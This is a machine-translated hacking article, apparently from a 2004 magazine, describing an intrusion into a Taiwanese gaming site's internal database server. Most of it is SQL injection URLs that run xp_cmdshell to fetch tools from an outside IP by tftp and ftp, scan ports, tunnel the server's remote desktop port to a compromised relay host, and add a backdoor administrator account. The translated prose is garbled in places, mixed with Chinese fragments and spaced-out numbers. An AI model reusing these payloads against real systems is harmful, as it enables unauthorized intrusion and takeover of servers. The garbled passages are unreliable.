Within the network database server invasion combat-vulnerability warning-the black bar safety net

Takeaway: deal with server the internal network and the external does not open the port of the database server, in addition to the bounce the Port to get a shell, there’s no other good way to Do all in cmd,too much trouble, inconvenient we penetrate further within the network, following by a site explaining my approach.

Objectives: http://xx.tw, Taiwan’s largest game comprehensive website, pre-information, the web presence of the injection point, theweb serverand the database server is not the same machine. Connect to the database server is sql sa permissions, using nbsi2 seen, including the network and database server external does not start in the mouth, web serveronly 8 0 the port mapping, we look at the database server could not access the Internet.

| http://xx…tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ create table [xl] ([xl1][varchar](2 5 5),[xl2][varchar](2 5 5))—
http://xx…tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ insert into xl(xl1) exec%20master. dbo. xp_cmdshell%2 0’to the ping 163.com’–

And then broke xl1 content, grace, the inner network machines can access the Internet, everything is so lucky. Start the pass one can download things of the program in the past. 是 winegg 的 down.exe

http://xx…tw/news-game.asp?ch_id=001&newsid=2 2 1 5 insert%20into%20xl(xl1) exec%20master. dbo. xp_cmdshell%2 0’tftp –I 211.78.39.64 get down.exe’–

Use xp_dirtree to look at, system32 under no this file, the xl1 there is also the display timeout is unsuccessful, change the tftp server to test, or unsuccessful,only with ftp:

http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’echo open 211.78.39.64 >345.txt’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’echo xxxx >>345.txt’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’echo xxxx >>345.txt’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’echo get down.exe >>345.txt’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’echo qui >>345.txt’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec%20master. dbo. xp_cmdshell%2 0’ftp-s:345.txt’–

ok,success. You can then download something, 先下载个卡端口的fprt.exe view the xl1,find success, and see him opening what port.

http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’%20insert%20into%20xl(xl1)%20exec%20master. dbo. xp_cmdshell%2 0’down.exe%20http://666w.com/tools/foprt.exe’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’%20insert%20into%20xl(xl1)%20exec%20master. dbo. xp_cmdshell%2 0’fport’–

Open 3 3 8 9, but apparently no external network mapping, what should I do? We need to get his map out, find the yyc to write vIDC software, this software sub-client and server end, the server end of the idc. exe in the chicken run, use the default 8 0 8 0 port directly on the broiler to run it ok. 客户端 vIDCc.exe and vIDCc.DLL is the graphical interface, can not use, I to modify the look, add a ini file and let him press the ini file where the configuration is automatically connected to the bind port, ok, with down. exe download to the invasion of the server, the run would have been bound to the 3 3 8 9, here we are put within the network database server 3 3 8 9 port,bound to my broiler 7-7 7 8-port,in the invasion of the machine to add the administrator:

http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec master. dbo. xp_cmdshell ‘vidcc.exe’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec master. dbo. xp_cmdshell ‘net user xiaolu luaixue /add’–
http://xx.tw/news-game.asp?ch_id=001&newsid=2 2 1 5’ exec master. dbo. xp_cmdshell ‘net localgroup administrators xiaolu /add’–

Ok landing broiler 7-7 7 8-port, go after,is the database server, to sweep itthe web server,web serverhas opened almost all can open the ports include 1 3 9, and then, findpass, the sniffer,and so on, it is up to you.

PostScript: this article is intended to provide you with a new invasion of ideas that do not directly imitate, breaking the law to please themselves. This article, together with the revised vidc software have the hacker X-Files 2 0 0 4 No. 8 Release.